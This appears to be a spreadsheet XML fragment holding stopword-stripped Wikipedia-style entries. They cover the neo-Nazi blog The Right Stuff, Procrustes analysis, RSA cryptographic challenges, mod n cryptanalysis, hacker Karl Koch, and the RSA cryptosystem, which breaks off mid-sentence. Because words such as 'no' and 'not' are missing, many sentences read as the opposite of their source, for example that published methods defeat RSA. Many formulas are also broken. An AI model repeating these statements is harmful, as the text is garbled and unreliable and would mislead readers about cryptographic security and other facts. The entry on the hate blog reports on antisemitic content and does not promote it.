    <t>The Right Stuff (blog)</t>
  </si>
  <si>
    <t>right stuff neo-nazi, holocaust denial, white nationalist conspiracy theory media website hosting blog discussion forum, well podcasts, including daily shoah. founded american neo-nazi antisemitic conspiracy theorist mike peinovich (better known mike enoch), blog promoted "echoes", antisemitic marker uses triple parentheses around names identify jews social media. alex mcnabb, co-host daily shoah, fired emergency medical technician following violent racist comments expressed podcast. across platforms, personalities spread racial hatred, advocate racial discrimination, promote conspiracy theories jews supposed plots media, banking system, pornography industry manipulate harm white people. content views site promotes white supremacy, neo-nazism, antisemitism, holocaust denial, white genocide conspiracy theory. cites work kevin macdonald, former professor psychology antisemitic conspiracy theorist, known claiming jewish plot control world undermine interest white people.much content devoted holocaust denial, well denying genocidal nazi policies poles, russians, slavic "untermenschen". justify denial nazi atrocities, hosts promote conspiracy theory documentary record establishing genocides forged unspecified jews agents jews. blog overview december 2012, right stuff described political cultural blog" aimed unite "alt right" troll liberals progressives. over time, podcast became radical, adopted conspiratorial neo-nazi ideology. blog developed retains lexicon defining jargon used publications well wider alt-right movement. website achieved general notice promotion triple parentheses (((echo))). 2014 show began distortion effect names jews mentioned segment "merchant minute". meme adapted text parentheses, summer 2016 became known york times column topic.the right stuff earliest websites make term "cuckservative". addition, blog early proponent propaganda film with open gates, attacks multiculturalism middle eastern refugees europe, promotes conspiracy theory jews bringing refugees order harm white people.the blog seen steady decline peak 2017. september 2021, southern poverty center (splc) report found website declined traffic 87.5% since february 2017, coinciding decline total number cast members appearing daily shoah. february 2019, mike peinovich responded data subpoena sines kessler civil lawsuit stating "lost regular listeners," many users "cancelled accounts stopped visiting site.": part doxing incident early 2017, mike peinovich, founder right stuff years operated pseudonym mike enoch, doxxed fellow neo-nazis, released biographical information contradicted professed ideology. revealed peinovich's wife jewish, wedding featured traditional jewish rites chanting. neo-nazi, peinovich also mocked upon revelation serbian surname, light nazi germany's racial classification serbs subhumans ("untermenschen"), genocide serbs perpetrated croatian ustaše puppet regime.after doxxing, followers peinovich reacted angrily information revealed. they circulated forged images wife portrayed ethnicities negative mocking way. salon journalist matthew sheffield posited neo-nazi podcast listeners speculated peinovich jewish, "controlled opposition", otherwise disingenuous beliefs. alex mcnabb alex mcnabb former emergency medical technician (emt) appeared daily shoah pseudonym "dr. narcan". fired racist comments made came light, including comparing black patients animals claiming tortured young black using catheter needle. national justice party national justice party (njp) antisemitic white supremacist group political organization united states promotes white interests neo-nazism. ideology wants "the united states america declared outpost western civilization state dedicated european-heritage population posterity. policy state immigration natal policy ensure permanent european majority." party claims advocate white civil rights. party’s platform focuses declining white birth rates, non-white immigration, oppression working white people power jewish people, according splc.the group supports abolishing "the fbi, acts nothing political secret police force elite interests". group additionally wants "usurious predatory lending practices [to] outlawed. credit issued state middle-man profiteers". activity august 2020, right stuff announced establishment white supremacist political party called national justice party mike peinovich, platform based upon white genocide conspiracy theory. party platform also incorporates antisemitic elements, calling mandatory employment discrimination prevent jewish individuals working "vital institutions". chairmen party include number prominent white supremacist alt-right figures, including joseph jordan (also known eric striker), tony hovater, michael mckevitt, gregory conte, warren balogh, former member neo-nazi national alliance, alan balogh.on july 2021, hosted fifth party event midwest released full length documentary peinovich held speech called trump jewish president ever controlled jews. party's leaders also gave "heil hitler" salutes. previously hosted meeting response capitol riot. held inaugural event millersville pike outside lancaster, pennsylvania.njp members organized gatherings ohio, wisconsin, fargo anniversary death daisy “jupiter” paulsen, killed june 2021 protest cases claim "anti-white" killings minorities. jupiter's accused killer black.njp also connected antelope hill publishing publishes books nazis fascists sells books events internet. also white separatism neo-nazism united states antisemitism united states references external links right stuff</t>
  </si>
  <si>
    <t>Procrustes analysis</t>
  </si>
  <si>
    <t>statistics, procrustes analysis form statistical shape analysis used analyse distribution shapes. name procrustes (greek: προκρούστης) refers bandit greek mythology made victims either stretching limbs cutting off. mathematics: orthogonal procrustes problem method used find optimal rotation and/or reflection (i.e., optimal orthogonal linear transformation) procrustes superimposition (ps) object respect another. constrained orthogonal procrustes problem, subject det(r) (where rotation matrix), method used determine optimal rotation object respect another (reflection allowed). contexts, method called kabsch algorithm.when shape compared another, shapes compared arbitrarily selected reference shape, procrustes analysis sometimes qualified classical ordinary, opposed generalized procrustes analysis (gpa), compares three shapes optimally determined "mean shape". introduction compare shapes objects, objects must first optimally "superimposed". procrustes superimposition (ps) performed optimally translating, rotating uniformly scaling objects. words, placement space size objects freely adjusted. obtain similar placement size, minimizing measure shape difference called procrustes distance objects. this sometimes called full, opposed partial scaling performed (i.e. size objects preserved). notice that, full objects exactly coincide shape identical. instance, full spheres different radii always coincide, exactly shape. conversely, partial never coincide. this implies that, strict definition term shape geometry, shape analysis performed using full statistical analysis based partial pure shape analysis sensitive shape differences, also size differences. both full partial never manage perfectly match objects different shape, cube sphere, right hand left hand. cases, full partial also include reflection. reflection allows, instance, successful (possibly perfect) superimposition right hand left hand. thus, partial reflection enabled preserves size allows translation, rotation reflection, full reflection enabled allows translation, rotation, scaling reflection. optimal translation scaling determined much simpler operations (see below). ordinary procrustes analysis here consider objects made finite number points dimensions. often, points selected continuous surface complex objects, human bone, case called landmark points. shape object considered member equivalence class formed removing translational, rotational uniform scaling components. translation example, translational components removed object translating object mean object's points (i.e. centroid) lies origin. mathematically: take {\displaystyle points dimensions, {\displaystyle ((x_{1},y_{1}),(x_{2},y_{2}),\dots ,(x_{k},y_{k}))\,} .the mean points {\displaystyle ({\bar {x}},{\bar {y}})} {\displaystyle {\bar {x}}={\frac {x_{1}+x_{2}+\cdots +x_{k}}{k}},\quad {\bar {y}}={\frac {y_{1}+y_{2}+\cdots +y_{k}}{k}}.} translate points mean translated origin {\displaystyle (x,y)\to (x-{\bar {x}},y-{\bar {y}})} giving point {\displaystyle (x_{1}-{\bar {x}},y_{1}-{\bar {y}}),\dots uniform scaling likewise, scale component removed scaling object root mean square distance (rmsd) points translated origin this rmsd statistical measure object's scale size: {\displaystyle s={\sqrt {{(x_{1}-{\bar {x}})^{2}+(y_{1}-{\bar {y}})^{2}+\cdots \over k}}} scale becomes point coordinates divided object's initial scale: {\displaystyle ((x_{1}-{\bar {x}})/s,(y_{1}-{\bar {y}})/s)} .notice methods defining removing scale sometimes used literature. rotation removing rotational component complex, standard reference orientation always available. consider objects composed number points scale translation removed. points {\displaystyle ((x_{1},y_{1}),\ldots {\displaystyle ((w_{1},z_{1}),\ldots objects used provide reference orientation. reference object rotate around origin, find optimum angle rotation {\displaystyle \theta \,\!} squared distances (ssd) corresponding points minimised example least squares technique). rotation angle {\displaystyle \theta \,\!} gives {\displaystyle (u_{1},v_{1})=(\cos \theta \,w_{1}-\sin \theta \,z_{1},\,\sin \theta \,w_{1}+\cos \theta \,z_{1})\,\!} .where (u,v) coordinates rotated point. taking derivative {\displaystyle (u_{1}-x_{1})^{2}+(v_{1}-y_{1})^{2}+\cdots respect {\displaystyle \theta solving {\displaystyle \theta derivative zero gives {\displaystyle \theta =\tan ^{-1}\left({\frac {\sum _{i=1}^{k}(w_{i}y_{i}-z_{i}x_{i})}{\sum _{i=1}^{k}(w_{i}x_{i}+z_{i}y_{i})}}\right).} when object three-dimensional, optimum rotation represented 3-by-3 rotation matrix rather simple angle, case singular value decomposition used find optimum value (see solution constrained orthogonal procrustes problem, subject det(r) shape comparison difference shape objects evaluated "superimposing" objects translating, scaling optimally rotating explained above. square root mentioned corresponding points used statistical measure difference shape: {\displaystyle d={\sqrt {(u_{1}-x_{1})^{2}+(v_{1}-y_{1})^{2}+\cdots }}.} this measure often called procrustes distance. notice complex definitions procrustes distance, measures "shape difference" sometimes used literature. superimposing shapes showed superimpose shapes. method applied superimpose three shapes, mentioned reference orientation used them. however, generalized procrustes analysis provides better method achieve goal. generalized procrustes analysis (gpa) applies procrustes analysis method optimally superimpose objects, instead superimposing arbitrarily selected shape. generalized ordinary procrustes analysis differ determination reference orientation objects, former technique optimally determined, latter arbitrarily selected. scaling translation performed techniques. when shapes compared, equivalent ordinary procrustes analysis. algorithm outline following: arbitrarily choose reference shape (typically selecting among available instances) superimpose instances current reference shape compute mean shape current superimposed shapes procrustes distance mean reference shape threshold, reference mean shape continue step variations there many ways representing shape object. shape object considered member equivalence class formed taking sets points dimensions, factoring translations, rotations scalings. particular representation shape found choosing particular representation equivalence class. this give manifold dimension kn-4. procrustes method particular statistical justification. bookstein obtains representation shape fixing position points called bases line. point fixed origin (1,0) remaining points form bookstein coordinates. also common consider shape scale translational rotational components removed. examples shape analysis used biological data identify variations anatomical features characterised landmark data, example considering shape bones.one study david george kendall examined triangles formed standing stones deduce often arranged straight lines. shape triangle represented point sphere, distribution shapes thought distribution sphere. sample distribution standing stones compared theoretical distribution show occurrence straight lines average. also active shape model alignments random points biometrics generalized procrustes analysis image registration kent distribution morphometrics orthogonal procrustes problem procrustes references f.l. bookstein, morphometric tools landmark data, cambridge university press, (1991). j.c. gower, g.b. dijksterhuis, procrustes problems, oxford university press (2004). i.l.dryden, k.v. mardia, statistical shape analysis, wiley, chichester, (1998). external links extensions continuum points distributions procrustes methods, shape recognition, similarity docking, michel petitjean.</t>
  </si>
  <si>
    <t>RSA Secret-Key Challenge</t>
  </si>
  <si>
    <t>secret-key challenge series cryptographic contests organised laboratories intent helping demonstrate relative security different encryption algorithms. challenge january 1997 2007. contest details contest, posted website block ciphertext random initialization vector used encryption. win, contestant would break code finding original plaintext cryptographic generate posted ciphertext plaintext. challenge consisted contest twelve contests based around block cipher rc5. each contests named variant cipher used. name rc5-w/r/b indicates cipher used w-bit words, rounds, made bytes. contests often referred names corresponding distributed.net projects, example rc5-32/12/9 often known rc5-72 72-bit size. first contest challenge (and also part challenges) completed hours minutes distributed.net eff's deep crack machine. 2007 laboratories announced termination challenge, stating would disclose solutions remaining contents, would confirm reward prize money future solutions. september 2008 distributed.net announced would fund prize $4000 rc5-32/12/9 contest. distributed.net contests associated distributed.net group, actively participated challenge making distributed computing perform brute force attack. rc5-32/12/7 completed october 1997, distributed.net finding winning days winning us$10,000 prize. recovered plaintext was: unknown message it's time move longer length. rc5-32/12/8 also carried us$10,000 prize completed distributed.net july 2002. took group 1,757 days locate key, revealing plaintext: unknown message some things better left unread. there eight contests solved, rc5/32/12/9 rc5/32/12/16, us$10,000 prize. distributed.net working rc5-32/12/9 7.559% march 2021 (6.700% june 2020, 5.329% september 2018, 4.356% january 2017). also factoring challenge references external links official contest page website current status contests within challenge encrypted messages contest unofficial status page distributed.net distributed.net's rc5-72 project statistics</t>
  </si>
  <si>
    <t>Mod n cryptanalysis</t>
  </si>
  <si>
    <t>cryptography, cryptanalysis attack applicable block stream ciphers. form partitioning cryptanalysis exploits unevenness cipher operates equivalence classes (congruence classes) modulo method first suggested 1999 john kelsey, bruce schneier, david wagner applied rc5p variant rc5) family block ciphers used firewire standard). these attacks used properties binary addition rotation modulo fermat prime. analysis rc5p rc5p, analysis conducted modulo observed operations cipher (rotation addition, 32-bit words) somewhat biased congruence classes illustrate approach, consider left rotation single bit: {\displaystyle x\lll 1=\left\{{\begin{matrix}2x,&amp;{\mbox{if }}x&lt;2^{31}\\2x+1-2^{32},&amp;{\mbox{if }}x\geq 2^{31}\end{matrix}}\right.} then, {\displaystyle 2^{32}\equiv 1{\pmod {3}},\,} follows {\displaystyle x\lll 1\equiv 2x{\pmod {3}}.} thus left rotation single simple description modulo analysis operations (data dependent rotation modular addition) reveals similar, notable biases. although theoretical problems analysing operations combination, bias detected experimentally entire cipher. (kelsey al., 1999), experiments conducted seven rounds, based conjecture many rounds rc5p distinguished random using attack. there also corresponding method recovering secret key. against attacks even effective. references john kelsey, bruce schneier, david wagner (march 1999). cryptanalysis, applications against rc5p (pdf/postscript). fast software encryption, sixth international workshop proceedings. rome: springer-verlag. 139–155. retrieved 2007-02-12.{{cite conference}}: maint: multiple names: authors list (link) vincent rijmen (2003-12-01). ""mod cryptanalysis rabbit" (pdf). white paper, version 1.0. cryptico. retrieved 2007-02-12. {{cite journal}}: cite journal requires |journal= (help) toshio tokita; tsutomu matsumoto. applicability differential cryptanalysis, linear cryptanalysis cryptanalysis encryption algorithm (iso9979-20)". ipsj journal. (8).</t>
  </si>
  <si>
    <t>Karl Koch (hacker)</t>
  </si>
  <si>
    <t>karl werner lothar koch (july 1965 1989) german hacker 1980s, called "hagbard", hagbard celine. involved cold computer espionage incident. biography koch born hanover. grew difficult circumstances. mother died cancer 1976, father alcohol problems. koch interested astronomy teenager involved state student's council. 1979 karl's father gave 1975 book, illuminatus! golden apple robert anton wilson robert shea, strong influence him. from income member state students' council, bought first atari computer 1982 named him: "fuckup" ("first universal cybernetic-kinetic ultra-micro programmer") illuminatus! trilogy. august 1984 father also died cancer. 1985 koch hackers founded computer-stammtisch hanover-oststadt, developed later chaos computer club hanover. during time koch came contact hard drugs often. february 1987 koch broke vacation spain, admitted psychiatric clinic aachen rehab treatments. left clinic 1987. hacking worked hackers known (dirk-otto brezinski), pengo (hans heinrich hübner), urmel (markus hess), involved selling hacked information united states military computers kgb. clifford stoll's book cuckoo's gives first-person account hunt eventual identification hess. pengo koch subsequently came forward confessed authorities espionage amnesty, protected prosecuted. death koch found burned death gasoline forest near celle, germany. death officially claimed suicide.koch left workplace lunch; returned late afternoon employer reported missing person. german police alerted abandoned forest near celle june 1989; upon investigation, appeared though moved years covered dust. remains koch point bones discovered close patch scorched burnt ground surrounding them, shoes missing. scorched earth controlled small circle around corpse; rained time, grass perfectly dry. suicide note found body.despite death officially ruled suicide, unusual circumstances koch's remains found least speculation koch's death self-inflicted; patch scorched ground surrounding body small seemingly controlled area, ostensibly much death self-immolation, suicide note ever found. karl koch media books katie hafner, john markoff (november 1995). cyberpunk: outlaws hackers computer frontier, revised (november 1995 ed.). simon schuster. 400. isbn 0-684-81862-0. movies german movie life, entitled released 1998. while film critically acclaimed, harshly criticized exploitative real-life witnesses. corrective film's take documentation written friends.in 1990 documentary released titled kgb, computer music koch memorialized clock opening music video "the hacker" liner notes "the hacker" album buried dreams (1989). also boris floricic a.k.a. tron, computer hacker allegedly suffered similar fate references external links imdb story grey hacker wikileaks karl werner lothar koch</t>
  </si>
  <si>
    <t>RSA Factoring Challenge</t>
  </si>
  <si>
    <t>factoring challenge challenge forward laboratories march 1991 encourage research computational number theory practical difficulty factoring large integers cracking keys used cryptography. they published list semiprimes (numbers exactly prime factors) known numbers, cash prize successful factorization them. smallest them, 100-decimal digit number called rsa-100 factored april 1991. many bigger numbers still factored expected remain unfactored quite time, however advances quantum computers make prediction uncertain shor's algorithm. 2001, laboratories expanded factoring challenge offered prizes ranging $10,000 $200,000 factoring numbers bits 2048 bits.the factoring challenges ended 2007. laboratories stated: "now industry considerably advanced understanding cryptanalytic strength common symmetric-key public-key algorithms, challenges longer active." when challenge ended 2007, rsa-576 rsa-640 factored 2001 challenge numbers.the factoring challenge intended track cutting edge integer factorization. primary application choosing length public-key encryption scheme. progress challenge give insight sizes still safe long. laboratories provider rsa-based products, challenge used incentive academic community attack core solutions order prove strength. numbers generated computer network connection kind. computer's hard drive subsequently destroyed record would exist, anywhere, solution factoring challenge.the first numbers generated, rsa-100 rsa-500 rsa-617, labeled according number decimal digits; numbers (beginning rsa-576) generated later labelled according number binary digits. numbers table listed increasing order despite shift decimal binary. mathematics laboratories states that: number exists prime numbers q.the problem find primes, given prizes records following table gives overview numbers. note factoring challenge ended 2007 prizes awarded factoring higher numbers. challenge numbers white lines part original challenge expressed base challenge numbers yellow lines part 2001 expansion expressed base also numbers, decimal expansions numbers known factorizations lcs35 magic words squeamish ossifrage, solution found 1993 another challenge posed 1977 secret-key challenge integer factorization records notes</t>
  </si>
  <si>
    <t>RSA (cryptosystem)</t>
  </si>
  <si>
    <t>(rivest–shamir–adleman) public-key cryptosystem widely used secure data transmission. also oldest. acronym "rsa" comes surnames rivest, shamir leonard adleman, publicly described algorithm 1977. equivalent system developed secretly 1973 gchq (the british signals intelligence agency) english mathematician clifford cocks. that system declassified 1997.in public-key cryptosystem, encryption public distinct decryption key, kept secret (private). user creates publishes public based large prime numbers, along auxiliary value. prime numbers kept secret. messages encrypted anyone, public key, decoded someone knows prime numbers.the security relies practical difficulty factoring product large prime numbers, "factoring problem". breaking encryption known problem. whether difficult factoring problem open question. there published methods defeat system large enough used. relatively slow algorithm. because this, commonly used directly encrypt user data. more often, used transmit shared keys symmetric-key cryptography, used bulk encryption–decryption. history idea asymmetric public-private cryptosystem attributed whitfield diffie martin hellman, published concept 1976. they also introduced digital signatures attempted apply number theory. their formulation used shared-secret-key created exponentiation number, modulo prime number. however, left open problem realizing one-way function, possibly difficulty factoring well-studied time.ron rivest, shamir, leonard adleman massachusetts institute technology made several attempts course year create one-way function hard invert. rivest shamir, computer scientists, proposed many potential functions, adleman, mathematician, responsible finding weaknesses. they tried many approaches, including "knapsack-based" "permutation polynomials". time, thought wanted achieve impossible contradictory requirements. april 1977, spent passover house student drank good deal manischewitz wine returning homes around midnight. rivest, unable sleep, couch math textbook started thinking one-way function. spent rest night formalizing idea, much paper ready daybreak. algorithm known initials surnames order paper.clifford cocks, english mathematician working british intelligence agency government communications headquarters (gchq), described equivalent system internal document 1973. however, given relatively expensive computers needed implement time, considered mostly curiosity and, publicly known, never deployed. discovery, however, revealed 1997 top-secret classification. kid-rsa (krsa) simplified, insecure public-key cipher published 1997, designed educational purposes. some people feel learning kid-rsa gives insight public-key ciphers, analogous simplified des. patent patent describing algorithm granted september 1983: u.s. patent 4,405,829 "cryptographic communications system method". from dwpi's abstract patent: system includes communications channel coupled least terminal encoding device least terminal decoding device. message-to-be-transferred enciphered ciphertext encoding terminal encoding message number predetermined set. that number raised first predetermined power (associated intended receiver) finally computed. remainder residue, is... computed exponentiated number divided product predetermined prime numbers (associated intended receiver). detailed description algorithm published august 1977, scientific american's mathematical games column. this preceded patent's filing date december 1977. consequently, patent legal standing outside united states. cocks's work publicly known, patent united states would legal either. when patent issued, terms patent years. patent expire september 2000, security released algorithm public domain september 2000. operation algorithm involves four steps: generation, distribution, encryption, decryption. basic principle behind observation practical find three large positive integers modular exponentiation integers (with {\displaystyle (m^{e})^{d}\equiv m{\pmod {n}}} knowing even extremely difficult find triple denotes modular congruence. simple terms, modular congruence means divide (me)d divide remainder.) addition, operations convenient order exponentiations changed relation also implies {\displaystyle (m^{d})^{e}\equiv m{\pmod {n}}.} involves public private key. public known everyone used encrypting messages. intention messages encrypted public decrypted reasonable amount time using private key. public represented integers private integer (although also used decryption process, might considered part private too). represents message (previously prepared certain technique explained below). generation keys algorithm generated following way: choose distinct prime numbers security purposes, integers chosen random similar magnitude differ length digits make factoring harder. prime integers efficiently found using primality test. kept secret. compute used modulus public private keys. length, usually expressed bits, length. released part public key. compute λ(n), carmichael's totient function. since λ(n) lcm(λ(p), λ(q)), since prime, λ(p) φ(p) likewise λ(q) hence λ(n) lcm(p λ(n) kept secret. calculated euclidean algorithm, since lcm(a, |ab|/gcd(a, choose integer λ(n) gcd(e, λ(n)) λ(n) coprime. short bit-length small hamming weight results efficient encryption commonly chosen value 65537. smallest (and fastest) possible value small value shown less secure settings. released part public key. determine (mod λ(n)); modular multiplicative inverse modulo λ(n). this means: solve equation (mod λ(n)); computed efficiently using extended euclidean algorithm, since, thanks λ(n) coprime, said equation form bézout's identity, coefficients. kept secret private exponent.the public consists modulus public encryption) exponent private consists private decryption) exponent must kept secret. λ(n) must also kept secret used calculate fact, discarded computed.in original paper, euler totient function φ(n) 1)(q used instead λ(n) calculating private exponent since φ(n) always divisible λ(n), algorithm works well. possibility using euler totient function results also lagrange's theorem applied multiplicative group integers modulo thus satisfying (mod φ(n)) also satisfies (mod λ(n)). however, computing modulo φ(n) sometimes yield result larger necessary (i.e. λ(n)). most implementations accept exponents generated using either method private exponent all, rather using optimized decryption method based chinese remainder theorem described below), standards fips 186-4 require λ(n). "oversized" private exponents meeting criterion always reduced modulo λ(n) obtain smaller equivalent exponent. since common factors present factorisation 1)(q recommended small common factors, any, besides necessary 2.note: authors original paper carry generation choosing computing modular multiplicative inverse modulo φ(n), whereas current implementations rsa, following pkcs#1, reverse (choose compute since chosen small, whereas computed normally not, paper's algorithm optimizes decryption compared encryption, modern algorithm optimizes encryption instead. distribution suppose wants send information alice. decide rsa, must know alice's public encrypt message, alice must private decrypt message. enable send encrypted messages, alice transmits public reliable, necessarily secret, route. alice's private never distributed. encryption after obtains alice's public key, send message alice. first turns (strictly speaking, un-padded plaintext) integer (strictly speaking, padded plaintext), using agreed-upon reversible protocol known padding scheme. computes ciphertext using alice's public corresponding {\displaystyle c\equiv m^{e}{\pmod {n}}.} this done reasonably quickly, even large numbers, using modular exponentiation. transmits alice. note least nine values yield ciphertext equal unlikely occur practice. decryption alice recover using private exponent computing {\displaystyle c^{d}\equiv (m^{e})^{d}\equiv m{\pmod {n}}.} given recover original message reversing padding scheme. example here example encryption decryption. parameters used artificially small, also openssl generate examine real keypair. choose distinct prime numbers, {\displaystyle p=61} {\displaystyle q=53.} compute giving 3233. {\displaystyle n=61\times 53=3233.} compute carmichael's totient function product λ(n) lcm(p giving 3233 780. {\displaystyle \lambda (3233)=\operatorname {lcm} (60,52)=780.} choose number coprime 780. choosing prime number leaves check divisor 780. {\displaystyle e=17} compute modular multiplicative inverse (mod λ(n)), yielding {\displaystyle 1=(17\times 413){\bmod {7}}80.} public 3233, 17). padded plaintext message encryption function 233. {\displaystyle {\begin{aligned}c(m)&amp;=m^{e}{\bmod {n}}\\&amp;=m^{17}{\bmod {3}}233.\end{aligned}}} private 3233, 413). encrypted ciphertext decryption function 233. {\displaystyle {\begin{aligned}m(c)&amp;=c^{d}{\bmod {n}}\\&amp;=c^{413}{\bmod {3}}233.\end{aligned}}} instance, order encrypt calculate 2790. {\displaystyle c=65^{17}{\bmod {3}}233=2790.} decrypt 2790, calculate 2790 {\displaystyle m=2790^{413}{\bmod {3}}233=65.} both calculations computed efficiently using square-and-multiply algorithm modular exponentiation. real-life situations primes selected would much larger; example would trivial factor 3233 (obtained freely available public key) back primes also public key, inverted thus acquiring private key. practical implementations chinese remainder theorem speed calculation using modulus factors (mod using values qinv, part private computed follows: {\displaystyle {\begin{aligned}d_{p}&amp;=d{\bmod {(}}p-1)=413{\bmod {(}}61-1)=53,\\d_{q}&amp;=d{\bmod {(}}q-1)=413{\bmod {(}}53-1)=49,\\q_{\text{inv}}&amp;=q^{-1}{\bmod {p}}=53^{-1}{\bmod {6}}1=38\\&amp;\rightarrow (q_{\text{inv}}\times q){\bmod {p}}=38\times 53{\bmod {6}}1=1.\end{aligned}}} here qinv used efficient decryption (encryption efficient choice suitable pair): 2790 2790 {\displaystyle {\begin{aligned}m_{1}&amp;=c^{d_{p}}{\bmod {p}}=2790^{53}{\bmod {6}}1=4,\\m_{2}&amp;=c^{d_{q}}{\bmod {q}}=2790^{49}{\bmod {5}}3=12,\\h&amp;=(q_{\text{inv}}\times (m_{1}-m_{2})){\bmod {p}}=(38\times -8){\bmod {6}}1=1,\\m&amp;=m_{2}+h\times q=12+1\times 53=65.\end{aligned}}} signing messages suppose alice uses bob's public send encrypted message. message, claim alice, verifying message alice, since anyone bob's public send encrypted messages. order verify origin message, also used sign message. suppose alice wishes send signed message bob. private produces hash value message, raises power (modulo decrypting message), attaches "signature" message. when receives signed message, uses hash algorithm conjunction alice's public key. raises signature power (modulo encrypting message), compares resulting hash value message's hash value. agree, knows author message possession alice's private message tampered since sent. this works exponentiation rules: hash {\displaystyle h=\operatorname {hash} (m),} {\displaystyle (h^{e})^{d}=h^{ed}=h^{de}=(h^{d})^{e}\equiv h{\pmod {n}}.} thus keys swapped without loss generality, private pair used either decrypt message intended recipient, encrypted anyone public (asymmetric encrypted transport). encrypt message decrypted anyone, encrypted person; provides digital signature. proofs correctness proof using fermat's little theorem proof correctness based fermat's little theorem, stating (mod integer prime dividing a.we want show {\displaystyle (m^{e})^{d}\equiv m{\pmod {pq}}} every integer distinct prime numbers positive integers satisfying (mod λ(pq)). since λ(pq) lcm(p construction, divisible write {\displaystyle ed-1=h(p-1)=k(q-1)} nonnegative integers k.to check whether numbers, congruent suffices (and fact equivalent) check congruent separately.to show (mod consider cases: (mod multiple thus multiple (mod {\displaystyle \not \equiv (mod {\displaystyle m^{ed}=m^{ed-1}m=m^{h(p-1)}m=(m^{p-1})^{h}m\equiv 1^{h}m\equiv m{\pmod {p}},} used fermat's little theorem replace mp−1 1.the verification (mod proceeds completely analogous way: (mod multiple (mod {\displaystyle \not \equiv (mod {\displaystyle m^{ed}=m^{ed-1}m=m^{k(q-1)}m=(m^{q-1})^{k}m\equiv 1^{k}m\equiv m{\pmod {q}}.} this completes proof that, integer integers (mod λ(pq)), {\displaystyle (m^{e})^{d}\equiv m{\pmod {pq}}.} notes: proof using euler's theorem although original paper rivest, shamir, adleman used fermat's little theorem explain works, common find proofs rely instead euler's theorem. want show (mod product different prime numbers, positive integers satisfying (mod φ(n)). since positive, write hφ(n) non-negative integer assuming relatively prime {\displaystyle m^{ed}=m^{1+h\varphi (n)}=m(m^{\varphi (n)})^{h}\equiv m(1)^{h}\equiv m{\pmod {n}},} second-last congruence follows euler's theorem. more generally, satisfying (mod λ(n)), conclusion follows carmichael's generalization euler's theorem, states mλ(n) (mod relatively prime when relatively prime argument given invalid. this highly improbable (only proportion 1/(pq) numbers property), even case, desired congruence still true. either (mod (mod cases treated using previous proof. padding attacks plain there number attacks plain described below. when encrypting encryption exponents (e.g., small values (i.e., n1/e), result strictly less modulus case, ciphertexts decrypted easily taking root ciphertext integers. clear-text message sent recipients encrypted way, receivers share exponent different therefore easy decrypt original clear-text message chinese remainder theorem. johan håstad noticed attack possible even clear texts equal, attacker knows linear relation them. this attack later improved coppersmith (see coppersmith's attack). because encryption deterministic encryption algorithm (i.e., random component) attacker successfully launch chosen plaintext attack cryptosystem, encrypting likely plaintexts public test whether equal ciphertext. cryptosystem called semantically secure attacker cannot distinguish encryptions other, even attacker knows chosen) corresponding plaintexts. without padding semantically secure. property product ciphertexts equal encryption product respective plaintexts. that m1em2e (m1m2)e (mod because multiplicative property, chosen-ciphertext attack possible. e.g., attacker wants know decryption ciphertext (mod holder private decrypt unsuspicious-looking ciphertext (mod value chosen attacker. because multiplicative property, encryption (mod hence, attacker successful attack, learn (mod derive message multiplying modular inverse modulo given private exponent efficiently factor modulus given factorization modulus obtain private (d′, generated public (e′, padding schemes avoid problems, practical implementations typically embed form structured, randomized padding value encrypting this padding ensures fall range insecure plaintexts, given message, padded, encrypt large number different possible ciphertexts. standards pkcs#1 carefully designed securely messages prior encryption. because schemes plaintext number additional bits, size un-padded message must somewhat smaller. padding schemes must carefully designed prevent sophisticated attacks facilitated predictable message structure. early versions pkcs#1 standard version 1.5) used construction appears make semantically secure. however, crypto 1998, bleichenbacher showed version vulnerable practical adaptive chosen-ciphertext attack. furthermore, eurocrypt 2000, coron showed types messages, padding provide high enough level security. later versions standard include optimal asymmetric encryption padding (oaep), prevents attacks. such, oaep used application, pkcs#1 v1.5 padding replaced wherever possible. pkcs#1 standard also incorporates processing schemes designed provide additional security signatures, e.g. probabilistic signature scheme (rsa-pss). secure padding schemes rsa-pss essential security message signing message encryption. patents granted (u.s. patent 6,266,771 u.s. patent 7,036,014); however, patents expired july 2009 april 2010 respectively. longer seems encumbered patents. note using different pairs encryption signing potentially secure. security practical considerations using chinese remainder algorithm efficiency, many popular crypto libraries (such openssl, java .net) decryption signing following optimization based chinese remainder theorem. following values precomputed stored part private key: {\displaystyle {\displaystyle primes generation, {\displaystyle d_{p}=d{\pmod {p-1}},} {\displaystyle d_{q}=d{\pmod {q-1}},} {\displaystyle q_{\text{inv}}=q^{-1}{\pmod {p}}.} these values allow recipient compute exponentiation (mod efficiently follows: {\displaystyle m_{1}=c^{d_{p}}{\pmod {p}},} {\displaystyle m_{2}=c^{d_{q}}{\pmod {q}},} {\displaystyle h=q_{\text{inv}}(m_{1}-m_{2}){\pmod {p}}} {\displaystyle m=m_{2}+hq{\pmod {pq}}.} this efficient computing exponentiation squaring, even though modular exponentiations computed. reason modular exponentiations smaller exponent smaller modulus. integer factorization problem security cryptosystem based mathematical problems: problem factoring large numbers problem. full decryption ciphertext thought infeasible assumption problems hard, i.e., efficient algorithm exists solving them. providing security partial decryption require addition secure padding scheme.the problem defined task taking roots modulo composite recovering value (mod public key, ciphertext. currently promising approach solving problem factor modulus with ability recover prime factors, attacker compute secret exponent public decrypt using standard procedure. accomplish this, attacker factors computes lcm(p allows determination polynomial-time method factoring large integers classical computer found, proven none exists; integer factorization discussion problem. multiple polynomial quadratic sieve (mpqs) used factor public modulus first rsa-512 factorization 1999 used hundreds computers required equivalent 8,400 mips years, elapsed time approximately seven months. 2009, benjamin moody could factor 512-bit days using public software (ggnfs) desktop computer dual-core athlon64 1,900 cpu). just less gigabytes disk storage required gigabytes sieving process. rivest, shamir, adleman noted miller shown assuming truth extended riemann hypothesis finding hard factoring polynomial time difference). however, rivest, shamir, adleman noted, section ix/d paper, found proof inverting hard factoring. 2020, largest publicly known factored number bits (250 decimal digits, rsa-250). factorization, state-of-the-art distributed implementation, took approximately 2700 years. practice, keys typically 1024 4096 bits long. 2003, security estimated 1024-bit keys likely become crackable 2010. 2020, known whether keys cracked, minimum recommendations moved least 2048 bits. generally presumed secure sufficiently large, outside quantum computing. bits shorter, factored hours personal computer, using software already freely available. keys bits shown practically breakable 1999, rsa-155 factored using several hundred computers, factored weeks using common hardware. exploits using 512-bit code-signing certificates factored reported 2011. theoretical hardware device named twirl, described shamir tromer 2003, called question security 1024-bit keys.in 1994, peter shor showed quantum computer could ever practically created purpose would able factor polynomial time, breaking rsa; shor's algorithm. faulty generation finding large primes usually done testing random numbers correct size probabilistic primality tests quickly eliminate virtually nonprimes. numbers "too close", lest fermat factorization successful. less 2n1/4 p⋅q, even "small" 1024-bit values 